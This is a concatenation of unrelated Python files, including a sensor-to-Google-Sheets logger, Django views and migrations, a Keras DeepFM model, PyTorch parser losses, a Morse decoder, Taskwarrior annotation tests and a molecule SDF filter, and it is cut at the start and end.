bio_3 = ((li[3054])[1::2])
glycerin = ((li[3055])[1::2])
day_tank = ((li[3056])[1::2])
backup_day_tank_5k = ((li[3057])[1::2])
reclaimed_methanol_totalizer = ((li[3058])[1::2])
feed_stock_totalizer = ((li[3059])[1::2])
b100_temp = ((li[3060])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 12')
print (time)
minute += 1
else:
print('something didnt work')
if minute > 12:
minute = 2
'''
update sheets
'''
global row
sheet.update_cell(row, 1, date_modified)
sheet.update_cell(row, 2, time)
sheet.update_cell(row, 3, catalyst)
sheet.update_cell(row, 4, methanol_1)
sheet.update_cell(row, 5, methanol_2)
sheet.update_cell(row, 6, reclaimed_methanol)
sheet.update_cell(row, 7, dump_tank)
sheet.update_cell(row, 8, dump_tank_flow_meter)
sheet.update_cell(row, 9, tank_1)
sheet.update_cell(row, 10, tank_2)
sheet.update_cell(row, 11, tank_3)
sheet.update_cell(row, 12, disc_1_feed)
sheet.update_cell(row, 13, disc_1_out)
sheet.update_cell(row, 14, yg_offload_1)
sheet.update_cell(row, 15, yg_offload_2)
sheet.update_cell(row, 16, yg_15k_1)
sheet.update_cell(row, 17, yg_15k_2)
sheet.update_cell(row, 18, disc_2_feed)
sheet.update_cell(row, 19, disc_2_out)
sheet.update_cell(row, 20, wet_oil)
sheet.update_cell(row, 21, waste)
sheet.update_cell(row, 22, yg)
sheet.update_cell(row, 23, bio_1)
sheet.update_cell(row, 24, bio_2)
sheet.update_cell(row, 25, bio_3)
sheet.update_cell(row, 26, glycerin)
sheet.update_cell(row, 27, day_tank)
sheet.update_cell(row, 28, backup_day_tank_5k)
sheet.update_cell(row, 29, reclaimed_methanol_totalizer)
sheet.update_cell(row, 30, feed_stock_totalizer)
sheet.update_cell(row, 31, b100_temp_modified)
print('job ran')
row += 1
return
def running():
while True:
print("Program is Running..." )
print((datetime.datetime.now().time()))
time.sleep(60)
return
'''
schedule.every().day.at("15:29").do(job)
#schedule.every().day.at("13:02").do(job)
while True:
schedule.run_pending()
time.sleep(60)
'''
if __name__ == '__main__':
start_time = time.time()
while True:
job()
time.sleep(30.0 - ((time.time()-start_time) % 30.0 ))
|
# coding:utf-8
def script(s, player=None):
from NaoQuest.objective import Objective
from NaoCreator.setting import Setting
from NaoCreator.Tool.speech_move import speech_and_move
if not player:
Setting.error("Error in execution of post_script of objective \"q1\": player is None")
return
if hasattr(s, "kw_answer"):
if s.kw_answer == "1" or s.kw_answer == "un":
player.current_quest.point += 1
speech_and_move(u"Félicitation tu a la bonne réponse.")
else:
speech_and_move(u"mauvaise réponse ! La bonne réponse était. 1.")
speech_and_move(u"Voici l'explication : Le paillage est une méthode pour protéger des excès de chaleur, "
u"de froid, limiter l'évaporation et empécher les mauvaises herbes. "
u"Il s'agit de recouvrir le sol avec une couche de paillis au début de la saison"
u"de culture et de renouveler l'opération si nécessaire.") |
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import backend
from tensorflow.keras import layers
import pandas as pd
def model(embedding_size, field_vocab_size=[], hidden_units=[4,4,4], dropout=0.5):
F = len(field_vocab_size)
# prepare embeddings
inputs = []
embed_list = []
embed_one_list = []
for i, vocab_size in enumerate(field_vocab_size):
in_ = keras.Input(shape=(1,))
inputs.append(in_)
embed_list.append(layers.Embedding(vocab_size, embedding_size, input_length=1)(in_))
embed_one_list.append(layers.Embedding(vocab_size, 1, input_length=1)(in_))
embed_list = layers.concatenate(embed_list, axis=1) # none, F, K
fm_first_in = layers.concatenate(embed_one_list, axis=1) # None, F, 1
fm_first_in = layers.Lambda(lambda x: backend.squeeze(x, axis=2))(fm_first_in)
# dense layer
dropouts = [dropout] * len(hidden_units)
weight_init = keras.initializers.glorot_uniform()
deep_in = layers.Reshape((F*embedding_size,))(embed_list)
for i, (h, d) in enumerate(zip(hidden_units, dropouts)):
z = layers.Dense(units=h, kernel_initializer=weight_init)(deep_in)
z = layers.BatchNormalization(axis=-1)(z)
z = layers.Activation("relu")(z)
z = layers.Dropout(d,seed=d * i)(z) if d > 0 else z
deep_out = layers.Dense(units=1, activation=tf.nn.softmax, kernel_initializer=weight_init)(z)
# deep_out: None, 1
# fm layer
fm_first_order = layers.Lambda(lambda x: backend.sum(x, axis=1))(fm_first_in) #None, 1
emb_sum_squared = layers.Lambda(lambda x: backend.square(backend.sum(x, axis=1)))(embed_list) #none, K
emb_squared_sum = layers.Lambda(lambda x: backend.sum(backend.square(x), axis=1))(embed_list) #none, K
fm_second_order = layers.Subtract()([emb_sum_squared, emb_squared_sum])
fm_second_order = layers.Lambda(lambda x: backend.sum(x, axis=1))(fm_second_order) #none, 1
fm_out = layers.Add()([fm_first_order, fm_second_order])
out = layers.Add()([deep_out, fm_out])
out = layers.Activation(activation='sigmoid')(out)
model = keras.Model(inputs=inputs, outputs=out)
return model
|
from django.shortcuts import render
def code(request):
context = {"code": request.session['user_id']}
return render(request, "turk/code.html", context)
|
from src.mongo import Mongo
from src.etl.aggregate_card_deck_occurrences.card_deck_occurrence_aggregator import CardDeckOccurrenceAggregator
def handler(event=None, context=None):
mongo = Mongo()
CardDeckOccurrenceAggregator(mongo).run()
if __name__ == '__main__':
handler()
|
from .gcn import GCN
from .sgc import SGC
from .gat import GAT |
# Generated by Django 2.1.3 on 2019-01-19 19:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DatesAvailable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('startTime', models.DateField(auto_now=True)),
('endTime', models.DateField(auto_now=True)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=30)),
('lastName', models.CharField(max_length=30)),
('year', models.IntegerField()),
('major', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Tutor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.RenameField(
model_name='student',
old_name='firstName',
new_name='subjectLookingFor',
),
migrations.RemoveField(
model_name='student',
name='lastName',
),
migrations.RemoveField(
model_name='student',
name='major',
),
migrations.RemoveField(
model_name='student',
name='year',
),
migrations.AddField(
model_name='student',
name='payOffered',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='tutor',
name='pastStudents',
field=models.ManyToManyField(to='student.Student'),
),
migrations.AddField(
model_name='tutor',
name='profile',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Profile'),
),
migrations.AddField(
model_name='tutor',
name='timesAvailable',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student.DatesAvailable'),
),
migrations.AddField(
model_name='student',
name='profile',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Profile'),
),
]
|
from django.conf.urls import patterns, include, url
from apps.main.views import IndexView, NewsView, ArticleView, NewsinView, ArticleinView, ContactsView, SearchView
""" autocomplete_light.autodiscover()
BEFORE
admin.autodiscover()"""
import autocomplete_light
autocomplete_light.autodiscover()
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'realist.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^autocomplete/', include('autocomplete_light.urls')),
url(r'^$', IndexView.as_view(), name='index'),
url(r'^news/', NewsView.as_view(), name='news'),
url(r'^articles/', ArticleView.as_view(), name='articles'),
url(r'^article_page/', ArticleinView.as_view(), name='articlepage'),
url(r'^contacts/', ContactsView.as_view(), name='contacts'),
url(r'^search/', SearchView.as_view(), name='search'),
url(r'^news_page/', NewsinView.as_view(), name='newspage'),
)
|
TEST = 'woo'
PATH = 5 |
from django.shortcuts import render
from .models import ServicesData,FeedbackData,EnquiryData
from .forms import FeedbackForm,EnquiryForm
from django.http.response import HttpResponse
import datetime as dt
date1 = dt.datetime.now()
def home_view (request):
return render(request,'durgasoft_home.html')
def services_view(request):
services = ServicesData.objects.all()
return render(request,'durgasoft_services.html',{ 'services' :services})
def enquiry_view(request):
if request.method == "POST":
eform = EnquiryForm(request.POST)
if eform.is_valid():
name = request.POST.get('name')
mobile = request.POST.get('mobile')
email = request.POST.get('email')
gender = request.POST.get('gender')
courses = eform.cleaned_data.get('courses')
shifts = eform.cleaned_data.get('shifts')
start_date = eform.cleaned_data.get('start_date')
data=EnquiryData(
name=name,
mobile=mobile,
email=email,
gender=gender,
courses=courses,
shifts=shifts,
start_date=start_date
)
data.save()
eform = EnquiryForm()
return render(request, 'durgasoft_contact.html', {'eform': eform})
else:
return HttpResponse("user invalid data")
else:
eform = EnquiryForm()
return render(request,'durgasoft_contact.html',{'eform':eform})
def gallery_view(request):
return render(request,'durgasoft_gallery.html')
def feedback_view(request):
if request.method == "POST":
fform = FeedbackForm(request.POST)
if fform.is_valid():
name = request.POST.get('name')
rating = request.POST.get('rating')
feedback = request.POST.get('feedback')
data = FeedbackData(
name = name,
rating = rating,
feedback = feedback,
date = date1
)
data.save()
fform = FeedbackForm()
feedbacks = FeedbackData.objects.all()
return render(request,'durgasoft_feedback.html',{'feedbacks':feedbacks,'fform':fform})
else:
return HttpResponse('user invalid data')
else:
fform = FeedbackForm()
feedbacks = FeedbackData.objects.all()
return render(request,'durgasoft_feedback.html' ,{'feedbacks':feedbacks,'fform':fform})
|
from abc import ABC, abstractmethod
import torch
from torch import nn, Tensor
from torch.nn.modules.loss import _Loss
from parseridge.utils.logger import LoggerMixin
class Loss(ABC, LoggerMixin):
@abstractmethod
def __call__(
self,
pred_transitions: Tensor,
pred_relations: Tensor,
gold_transitions: Tensor,
gold_relations: Tensor,
wrong_transitions: Tensor,
wrong_transitions_lengths: Tensor,
wrong_relations: Tensor,
wrong_relations_lengths: Tensor,
) -> Tensor:
raise NotImplementedError()
class PyTorchLoss(Loss):
"""
Wrapper that calls the given PyTorch loss function and strips all other arguments.
"""
def __init__(self, criterion):
self.criterion = criterion
assert isinstance(self.criterion, _Loss)
def __call__(
self,
pred_transitions: Tensor,
pred_relations: Tensor,
gold_transitions: Tensor,
gold_relations: Tensor,
**kwargs,
) -> Tensor:
loss_transition = self.criterion(pred_transitions, gold_transitions)
loss_relation = self.criterion(pred_relations, gold_relations)
return loss_transition + loss_relation
class MaxMarginLoss(Loss):
def __init__(self, margin_threshold: float = 1.0):
self.margin_threshold = margin_threshold
def __call__(
self,
pred_transitions: Tensor,
pred_relations: Tensor,
gold_transitions: Tensor,
gold_relations: Tensor,
wrong_transitions: Tensor,
wrong_transitions_lengths: Tensor,
wrong_relations: Tensor,
wrong_relations_lengths: Tensor,
) -> Tensor:
gold_scores = self._get_gold_scores(
pred_transitions, pred_relations, gold_transitions, gold_relations
)
wrong_scores = self._get_wrong_scores(
pred_transitions,
pred_relations,
wrong_transitions,
wrong_relations,
wrong_transitions_lengths,
)
# Compute the margin between the best wrong scores and the gold scores
scores = wrong_scores - gold_scores
# Sum the loss only for those items where the difference is below the threshold
masked_scores = scores[gold_scores < wrong_scores + self.margin_threshold]
loss = torch.mean(masked_scores)
return loss
@staticmethod
def _get_gold_scores(
pred_transitions: Tensor,
pred_relations: Tensor,
gold_transitions: Tensor,
gold_relations: Tensor,
) -> Tensor:
# Compute the scores of the gold items by adding the score for the relation to
# the score of the transition.
gold_transitions_scores = pred_transitions.gather(
dim=1, index=gold_transitions.unsqueeze(1)
)
gold_relations_scores = pred_relations.gather(
dim=1, index=gold_relations.unsqueeze(1)
)
return (gold_transitions_scores + gold_relations_scores).squeeze()
@staticmethod
def _get_wrong_scores(
pred_transitions: Tensor,
pred_relations: Tensor,
wrong_transitions: Tensor,
wrong_relations: Tensor,
wrong_transitions_lengths: Tensor,
) -> Tensor:
# In every batch, compute a score for all the wrong items
wrong_transitions_scores = torch.gather(pred_transitions, 1, wrong_transitions)
wrong_relations_scores = torch.gather(pred_relations, 1, wrong_relations)
wrong_scores = wrong_transitions_scores + wrong_relations_scores
# For clarity, we rename the variable,
# since wrong_transitions_lengths == wrong_relations_lengths
wrong_actions_lengths = wrong_transitions_lengths
# Create a mask based on sequence lengths.
# See: http://juditacs.github.io/2018/12/27/masked-attention.html
max_len = wrong_scores.size(1)
device = wrong_actions_lengths.device
mask = (
torch.arange(max_len, device=device)[None, :] < wrong_actions_lengths[:, None]
)
# Invert mask and blank out all padding.
wrong_scores[~mask] = float("-inf")
# Get the best wrong action for each item in the batch
wrong_scores, _ = torch.max(wrong_scores, dim=1)
return wrong_scores
class Criterion(Loss):
LOSS_FUNCTIONS = {
"CrossEntropy": lambda kwargs: PyTorchLoss(nn.CrossEntropyLoss(**kwargs)),
"MSELoss": lambda kwargs: PyTorchLoss(nn.MSELoss(**kwargs)),
"NLLLoss": lambda kwargs: PyTorchLoss(nn.NLLLoss(**kwargs)),
"MaxMargin": lambda kwargs: MaxMarginLoss(**kwargs),
}
def __init__(self, loss_function: str = "CrossEntropy", **kwargs):
if loss_function not in self.LOSS_FUNCTIONS:
raise ValueError(
f"Unknown loss function: {loss_function}. "
f"Must be one of {list(self.LOSS_FUNCTIONS.keys())}"
)
self.criterion = self.LOSS_FUNCTIONS[loss_function](kwargs)
def __call__(self, *args, **kwargs) -> Tensor:
return self.criterion(*args, **kwargs)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 9 10:14:20 2020
@author: ritambasu
"""
#writing the code:
import numpy as np
a = np.array([[1,0.67,0.33],[0.45,1,0.55],[0.67,0.33,1]])
b = np.array([2,2,2])
x = np.linalg.solve(a,b)
true_solved_solution = np.array([1.0,1.0,1.0])
print (x)
#checking Ax=b is true or false:
y = np.allclose(np.dot(a, x), b, true_solved_solution )
print ("Is the solution matched with the true one?",y) |
from decoder_29628792 import Decoder
from character_29628792 import CharacterAnalyser
from word_29628792 import WordAnalyser
from sentence_29628792 import SentenceAnalyser
def get_input():
encoded = input("Enter a sequence of morse code: ")
if encoded.count("***") == 0 : # To ensure every input has at least one set of "***"
print( "Invalid input, there should be at least one set of three consecutive '*'")
return False
if encoded[len(encoded)-6 : len(encoded)] not in ["001100", "010101","110011"]: # To ensure input ends with a punctuation
print( "Invalid input, every input must end with a punctuation.")
return False
coded_words = encoded.split("***")
for each_word in coded_words: # To ensure every letter is defined in the dictionary
coded_letters = each_word.split('*')
for each_letter in coded_letters:
if each_letter not in Decoder().dictionary:
print("Invalid input, it is not defined in the dictionary")
return False
return encoded
def choice(): # To create a menu for the user to choose which level of analyse will be made.
choice = input("If you want to analyse characters: press c then enter \n"
"if you want to analyse words: press w then enter \n"
"if you want to analyse sentences: press s then enter \n"
"if you want to analyse all: press a then enter \n")
return choice
def main ():
decoder = Decoder() # Instances for all classes
character_analyser = CharacterAnalyser()
word_analyser = WordAnalyser()
sentence_analyser = SentenceAnalyser()
one_more_entry=True # created to get input from user until he/she terminates
all_decoded_strings = "" # stores all valid, decoded sequences to show total occurrences when the program is terminated
while one_more_entry == True:
in_put = get_input()
if in_put != False: # Ignores input before decode it. If get_input() returns False, There is an error and program tries to get one more input
decoded=decoder.decode(in_put)
all_decoded_strings += decoded # Adds all valid, decoded sequences to show total occurrences when the program is terminated
print(decoded) # To show every decoded sequence for every input.
ch=choice() #User menu to choose analyses
if ch=="c":
character_analyser.analyse_characters(decoded)
print("Number of characters decoded \n",character_analyser)
elif ch=='w':
word_analyser.analyse_words(decoded)
print("Number of words decoded \n",word_analyser)
elif ch=="s":
sentence_analyser.analyse_sentences(decoded)
print("Number of senteces decoded \n",sentence_analyser)
elif ch=="a":
sentence_analyser.analyse_sentences(decoded)
word_analyser.analyse_words(decoded)
character_analyser.analyse_characters(decoded)
print(character_analyser)
print(word_analyser)
print(sentence_analyser)
terminate = input("if you want to terminate, please press t then enter, if not just enter ")
if terminate =="t":
break
totalc=CharacterAnalyser() # New instances of classes to store and show total occurrences.
totalw=WordAnalyser() # We need to create new instances because pre defined ones stores occurences for every entry
totals=SentenceAnalyser() # And restarts for every input
totalc.analyse_characters(all_decoded_strings)
totalw.analyse_words(all_decoded_strings)
totals.analyse_sentences(all_decoded_strings)
print("Total number of character occurrences \n", totalc)
print("Total number of word occurrences \n", totalw)
print("Total number of sentences occurrences \n", totals)
if __name__ == '__main__':
main() |
import json
embassy = {}
i = 0 # change vary on len of dict
with open('mood.json') as data:
data = json.load(data)
#for i in data['embassies']: loop thru every country
email = data['embassies'][i]['email']
whom = data['embassies'][i]['title']
print(whom)
print(email)
if email and whom:
embassy.update({whom:email})
tf = '/Users/ejr/Desktop/everycount/dict.txt'
f = open(tf,"a")
with open(tf, "a") as f:
f.write(str(embassy))
f.write("\n")
f.truncate()
f.close() |
import unittest
from katas.kyu_8.jennys_secret_msg import greet
class GreetTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(greet('James'), 'Hello, James!')
def test_equals_2(self):
self.assertEqual(greet('Johnny'), 'Hello, my love!')
|
import scrapy
class QuotesSpider(scrapy.Spider):
name = "a"
def start_requests(self):
urls = [
'https://sh.lianjia.com/ershoufang/pudong/'
]
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
for a in response.css('clear.title'):
yield {
'href': a.css('href::text').extract_first()
} |
from django.urls import path
from quest import views
urlpatterns = [
path('1',views.V1,name ='inizio'),
path('2',views.ProvaView,name ='login_utenti' ),
# path('3',),
path('4',views.RegistrationView,name ='registrazione_utenti'),
path('5',views.RegistrationAnagView,name ='registrazioni_anagrafica'),
path('6',views.V6,name='ingresso_studi'),
path('7',views.RegistrationStudView,name ='registrazioni_studi'),
path('8',views.V8,name='uscita_studi'),
path('9',views.V9, name ='ingresso_esperienza'),
path('10',views.RegistrationExpView,name ='registrazioni_esperienze'),
path('11',views.V11,name='uscita_esperienze'),
path('12',views.V12,name='ingresso_lingue'),
path('13',views.RegistrationLangView,name ='registrazioni_lingue'),
path('14',views.V14,name='uscita_lingue'),
path('15',views.QuestView,name ='registrazioni_questionari'),
path('16',views.V16,name ='fine'),
path('17',views.V17,name ='pagina_utente'),
path('18',views.UpdatefirstStudView,name ='upload_primo_studi'),
path('19',views.V19,name ='upload_studi'),
path('20',views.UpdatesecondStudView,name ='upload_secondo_studi'),
path('21',views.UpdateFirstExpView,name ='upload_primo_esperienze'),
path('22',views.V22,name ='upload_esperienze'),
path('23',views.UpdateSecondExpView,name ='upload_secondo_esperienze'),
path('24',views.UpdateFirstLangView,name ='upload_primo_lingue'),
path('25',views.V25,name ='upload_lingue'),
path('26',views.UpdatesecondLangView,name ='upload_secondo_lingue'),
path('27',views.UpdateAnagView,name ='upload_anagrafica'),
# path('28',),
# path('29',),
# path('30',),
# path('31',),
]
|
while True:
try: x = list(map(int,input()))
except: break
for i in range(10,1,-1):
for n in range(1,i):
x[n-1] = (x[n-1] + x[n]) % 10
print(x[0]) |
import unittest
import copy
import json
from pprint import pprint
from manage_notes_annotation import load_task_data, manage_notes_annotation
TASK_ADD_NO_NOTES = {
"uuid": "test-uuid",
}
TASK_ADD_WITH_NOTES = {
"uuid": "test-uuid",
"notes": "test notes",
}
NOTE_ANNOTATION_NO_NOTES_BEFORE = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
}
NOTE_ANNOTATION_NO_NOTES_AFTER = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "",
}
MULTIPLE_ANNOTATIONS_NO_NOTES_BEFORE = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "",
}
MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
}
NOTE_ANNOTATION_WITH_NOTES_BEFORE = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
NOTE_ANNOTATION_WITH_NOTES_AFTER = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
NOTE_ANNOTATION_WITH_CHANGED_NOTES_BEFORE = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes changed",
}
MISSING_ANNOTATIONS_WITH_NOTES_BEFORE = {
"uuid": "test-uuid",
"notes": "test notes",
}
MISSING_ANNOTATIONS_WITH_NOTES_AFTER = {
"uuid": "test-uuid",
"notes": "test notes",
}
NO_ANNOTATION_WITH_NOTES_BEFORE = {
"annotations": [
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
NO_ANNOTATION_WITH_NOTES_AFTER = {
"annotations": [
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
MULTIPLE_ANNOTATIONS_WITH_NOTES_BEFORE = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER = {
"annotations": [
{
"description": "[Notes]",
"entry": "20190131T194834Z"
},
{
"description": "test description",
"entry": "20190131T194834Z"
},
],
"uuid": "test-uuid",
"notes": "test notes",
}
def process_data(data_before, data_after):
data = manage_notes_annotation(copy.deepcopy(data_before), copy.deepcopy(data_after))
return data
class TestManageNotesAnnotation(unittest.TestCase):
def test_load_task_data_add(self):
json_string = json.dumps(TASK_ADD_WITH_NOTES)
task_before, task_after = load_task_data(json_string, "")
self.assertEqual(task_before, {})
self.assertEqual(task_after, TASK_ADD_WITH_NOTES)
def test_load_task_data_modify(self):
json_string_before = json.dumps(NOTE_ANNOTATION_NO_NOTES_BEFORE)
json_string_after = json.dumps(NOTE_ANNOTATION_NO_NOTES_AFTER)
task_before, task_after = load_task_data(json_string_before, json_string_after)
self.assertEqual(task_before, NOTE_ANNOTATION_NO_NOTES_BEFORE)
self.assertEqual(task_after, NOTE_ANNOTATION_NO_NOTES_AFTER)
def test_add_task_no_notes(self):
data = process_data({}, TASK_ADD_NO_NOTES)
self.assertNotIn("annotations", data)
def test_add_task_with_notes(self):
data = process_data({}, TASK_ADD_WITH_NOTES)
self.assertEqual(len(data["annotations"]), 1)
self.assertEqual(data["annotations"][0]["description"], "[Notes]")
def test_note_annotation_no_notes(self):
data = process_data(NOTE_ANNOTATION_NO_NOTES_BEFORE, NOTE_ANNOTATION_NO_NOTES_AFTER)
self.assertNotIn("annotations", data)
def test_multiple_annotations_no_notes(self):
data = process_data(MULTIPLE_ANNOTATIONS_NO_NOTES_BEFORE, MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), len(MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER["annotations"]) - 1)
self.assertEqual(data["annotations"][0]["description"], "test description")
def test_note_annotation_with_notes(self):
data = process_data(NOTE_ANNOTATION_WITH_NOTES_BEFORE, NOTE_ANNOTATION_WITH_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), len(NOTE_ANNOTATION_WITH_NOTES_AFTER["annotations"]))
self.assertEqual(data["annotations"][0]["description"], "[Notes]")
def test_note_annotation_with_changed_notes(self):
data = process_data(NOTE_ANNOTATION_WITH_CHANGED_NOTES_BEFORE, NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), len(NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER["annotations"]))
self.assertEqual(data["annotations"][0]["description"], "[Notes]")
self.assertNotEqual(data["annotations"][0]["entry"], NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER["annotations"][0]["entry"])
def test_missing_annotations_with_notes(self):
data = process_data(MISSING_ANNOTATIONS_WITH_NOTES_BEFORE, MISSING_ANNOTATIONS_WITH_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), 1)
self.assertEqual(data["annotations"][0]["description"], "[Notes]")
def test_no_annotation_with_notes(self):
data = process_data(NO_ANNOTATION_WITH_NOTES_BEFORE, NO_ANNOTATION_WITH_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), len(NO_ANNOTATION_WITH_NOTES_AFTER["annotations"]) + 1)
self.assertEqual(data["annotations"][0]["description"], "test description")
self.assertEqual(data["annotations"][1]["description"], "[Notes]")
def test_multiple_annotations_with_notes(self):
data = process_data(MULTIPLE_ANNOTATIONS_WITH_NOTES_BEFORE, MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER)
self.assertEqual(len(data["annotations"]), len(MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER["annotations"]))
self.assertEqual(data["annotations"][0]["description"], "[Notes]")
self.assertEqual(data["annotations"][1]["description"], "test description")
if __name__ == '__main__':
unittest.main()
|
import sys
import collections
if len(sys.argv) == 1:
print('Code example \n')
print('... \n')
class Molecule:
def __init__(self, structure1, filds1):
self.structure1 = []
self.filds1 = collections.OrderedDict()
filename2 = sys.argv[1] # small sdf
idnumber_small = sys.argv[2] # idnumber small sdf
filename1 = sys.argv[3] # big sdf
idnumber_big = sys.argv[4] # idnumber big sdf
range1 = sys.argv[5] # 0.1-0.05
range2 = sys.argv[6] # 1
write_name = str(filename2)[:-4] + '_out.txt'
writefile = open(write_name, "w")
sdf_all_big = collections.OrderedDict()
sdf_all_small = collections.OrderedDict()
empty_list = []
final_list = []
input_list = []
def load_sdf_big():
print('\n' + '=' * 45)
linex = ''
openfile1 = open(filename1, "r")
a = []
b = collections.OrderedDict()
counter1 = 0
counter2 = 0
my_id = 0
filds = []
fields_value = []
field_value = []
for line in openfile1:
if counter1 == 0:
if line[:-1] == 'M END':
counter1 = 1
counter2 = 0
continue
else:
if counter2 == 1 and line[0] == '>':
fields_value.append(field_value)
field_value = []
counter2 = 0
if line[:-1] == '$$$$':
my_id += 1
fields_value.append(field_value)
z11 = Molecule(a, b)
xraniliwe4 = collections.OrderedDict()
for i in range(len(filds)):
xraniliwe3 = {filds[i]: fields_value[i]}
xraniliwe4.update(xraniliwe3)
z11.filds1.update(xraniliwe4)
xraniliwe2 = {str(my_id): z11}
sdf_all_big.update(xraniliwe2)
filds = []
field_value = []
fields_value = []
counter1 = 0
continue
if line[:4] == '> <':
counter2 = 1
line = line[4:-1]
for z in line:
if z != '>':
linex = linex + str(z)
filds.append(linex)
linex = ''
continue
elif line[:3] == '> <':
counter2 = 1
line = line[3:-1]
for z in line:
if z != '>':
linex = linex + str(z)
filds.append(linex)
linex = ''
continue
else:
if line[:-1] == '':
pass
else:
field_value.append(line[:-1])
openfile1.close()
print('big sdf loaded\n')
print('number of big base molecules = ' + str(len(sdf_all_big)) + '\n')
def load_sdf_small():
print('\n' + '=' * 45)
linex = ''
openfile2 = open(filename2, "r")
a = []
b = collections.OrderedDict()
counter1 = 0
counter2 = 0
my_id = 0
filds = []
fields_value = []
field_value = []
for line in openfile2:
if counter1 == 0:
if line[:-1] == 'M END':
counter1 = 1
counter2 = 0
continue
else:
if counter2 == 1 and line[0] == '>':
fields_value.append(field_value)
field_value = []
counter2 = 0
if line[:-1] == '$$$$':
my_id += 1
fields_value.append(field_value)
z12 = Molecule(a, b)
xraniliwe4 = collections.OrderedDict()
for i in range(len(filds)):
xraniliwe3 = {filds[i]: fields_value[i]}
xraniliwe4.update(xraniliwe3)
z12.filds1.update(xraniliwe4)
xraniliwe2 = {str(my_id): z12}
sdf_all_small.update(xraniliwe2)
filds = []
field_value = []
fields_value = []
counter1 = 0
continue
if line[:4] == '> <':
counter2 = 1
line = line[4:-1]
for z in line:
if z != '>':
linex = linex + str(z)
filds.append(linex)
linex = ''
continue
elif line[:3] == '> <':
counter2 = 1
line = line[3:-1]
for z in line:
if z != '>':
linex = linex + str(z)
filds.append(linex)
linex = ''
continue
else:
if line[:-1] == '':
pass
else:
field_value.append(line[:-1])
openfile2.close()
print('small sdf loaded\n')
print('number of qvery molecules = ' + str(len(sdf_all_small)) + '\n')
def input_list_fill():
openfile3 = open('1.txt', "r")
for sdf3 in sdf_all_small:
input_list.append(sdf_all_small.get(sdf3).filds1.get(idnumber_small)[0])
print('input list filed\n')
for line in openfile3:
if line[:-1] not in input_list:
input_list.append(line[:-1])
openfile3.close()
print(str(len(input_list)))
def find_by_pt():
counter1 = 0
status = 0
er = 0
total_found = 0
for sdf in sdf_all_small:
counter1 += 1
if counter1 == 300:
er += 300
print('search total ' + str(er) + ' molecules\n')
counter1 = 0
a = float(sdf_all_small.get(sdf).filds1.get('SlogP')[0])
SlogP_a = a + a * float(range1)
SlogP_d = a - a * float(range1)
b = float(sdf_all_small.get(sdf).filds1.get('TPSA')[0])
TPSA_a = b + b * float(range1)
TPSA_d = b - b * float(range1)
c = float(sdf_all_small.get(sdf).filds1.get('AMW')[0])
AMW_a = c + c * float(range1)
AMW_d = c - c * float(range1)
d = float(sdf_all_small.get(sdf).filds1.get('NumHeavyAtoms')[0])
NumHeavyAtoms_a = d + d * float(range1)
NumHeavyAtoms_d = d - d * float(range1)
e = float(sdf_all_small.get(sdf).filds1.get('NumHBD')[0])
NumHBD_a = e + float(range2)
NumHBD_d = e - float(range2)
f = float(sdf_all_small.get(sdf).filds1.get('NumHBA')[0])
NumHBA_a = f + float(range2)
